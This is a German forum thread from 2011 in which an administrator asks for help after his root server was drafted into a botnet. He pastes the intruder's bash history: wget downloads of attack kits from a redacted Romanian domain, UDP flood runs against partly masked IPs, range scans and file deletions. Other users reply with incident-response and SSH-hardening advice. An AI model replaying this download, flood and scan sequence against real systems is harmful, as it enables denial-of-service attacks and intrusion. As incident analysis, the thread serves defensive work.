root Server im BotNetzwerk - Perl Sicherheitslücke??

**gerry_coop** · 24.02.11, 00:11

Hallo und Guten Abend oder eher Guten Morgen,

ich habe einen root Server im Netzwerk der gerade (jetzt nicht mehr) in ein BotNetzwerk gewandert ist.

Ist euch irgendwas bekannt das in Perl eine Sicherheitslücke besteht? Denn irgenjemand hat gerade mein Server bedingt übernommen

Anbei die Befehle die als root benutzer ausgeführt wurden und somit eine FloodAtacke auf div. IP Adressen auslösen konnte.

************************ SNIP ************************
[WebSite_des_Angrifs_wurde_auskommentiert/udp.tgz
178 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
179 tar xzvf udp.tgz
180 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
181 perl udp.pl 200.165.1xx.xx 0 0 - IP Adresse geändert
182 wget xxxxxx.ro/a/x.tgz - domain aus Rumänien (Dateien haben Rumänische kommentare)
183 tar xzvf x.tgz
184 cd pma
185 rm -rf bios.txt
186 ./ss 25 -a 194 -i eth0 -s 10
187 wget xxxxxxx.ro/a/e.tgz
188 tar xzvf e.tgz
189 cd sc
190 nano x.pl
191 ./sc 217.160
192 ./sc 87.106
193 ./sc 66.252
194 ./sc 173.203
195 w
196 id
197 ./sc 213.160
198 w
199 ls
200 rm -rf new
201 rm -rf vuln.txt
202 ./sc 85.237
203 id
204 w
205 w
206 id
207 perl x.pl WH1981
208 perl x.pl xxxx.hu - Domain gelöscht
209 perl x.pl xxxx.com - Domain gelöscht
210 w
************************ SNAP ************************

da sind noch mehr Befehle die eingegeben wurden jedoch ist das der einstieg der Attacke.

Ich habe jetzt natürlich bammel damit Online zu gehen - zur Zeit läuft nur FTP und SSH aber irgenwann sollte wieder HTTP laufen.

Falls jemand was weiss währe ich für eine Info Dankbar.

Schöne Grüsse
Gerry

**marce** · 24.02.11, 06:12

damit ein Server übernommen werden kann muss von extern etwas enigeschleust werden - da Perl von sich aus nicht an externen Ports lauscht - kann Perl nicht die primäre Ursache sein.

Sprich - Du hast irgendwo anders eine Lücke im System.

-> das System ist nicht mehr vertrauenswürdig. Mach eine komplett-Sicherung zur Analyse und setze die Kiste komplett neu auf. Dann absichern, Dienste installieren, absichern, vertrauenswürdige Daten einspielen (am besten ohne die wohl irgendwo bestehende Lücke) und danach System sauber pflegen.

**gerry_coop** · 24.02.11, 08:33

Hallo marce,

hmmm - ok Danke für die Info. Habe mich schon innerlich und softwareseitig darauf vorbereitet

Was jedoch kommisch ist apache2 ist uptodate system uptodate exim, proftp und sshd genauso - deswegen kann ich mir den einbruch nicht wirklich erklären.

Schöne Grüsse
Gerry

PS: Grüsse in die Nachbarschaft

- das inet ist doch eine kleine Scheibe

**marce** · 24.02.11, 08:36

naja, Apache up2date ist ja schön und gut, wenn aber z.B. ein phpBB 2.0 oder ein phpMyAdmin-2x darauf läuft - oder "eigene" Scripte von "professionellen" Programmierern und dann das ganze System nicht optimal konfiguriert ist - bringt Dir das rein gar nichts...

Einbruchsfenster finden sich meist in Dritt-Software, nicht in dem, was die Distribution mitgegeben hat (so die aktuell und ordentlich gepflegt ist)...

**Wene** · 24.02.11, 11:22

Wie ist Dein SSHd konfiguriert? Kannst Du (und der Angreifer) Dich direkt als root anmelden? Und das womöglich noch mit Passwort statt mit Key? Und lässt sich das Passwort aus Wörtern im Wörterbuch zusammensetzen?

**gerry_coop** · 26.02.11, 12:51

Hallole,

SSHD ist nur mit login auth. gesichert da ein paar Leute SSH zugriff bekommen.
Passwd ist mit ZahlenGROSSklein und 12 Zeichen lang.

Ich habe heute das Teil sicherheitshalber neu installiert - debian Lenny - Squeeze wird leider nicht angeboten

Schönen Dank für die Hilfe
Grüsse und schönes WE
Gerry

**Wene** · 26.02.11, 20:37

Zitat von gerry_coop

SSHD ist nur mit login auth. gesichert da ein paar Leute SSH zugriff bekommen.

Zum einen muss root dafür keinen Zugriff haben. Ist dieser Login gesperrt?

Zum anderen ist es auch möglich die Keys von "ein paar Leuten" einzutragen so dass die Gefahr eines erratenen Passwortes weiter verkleinert wird.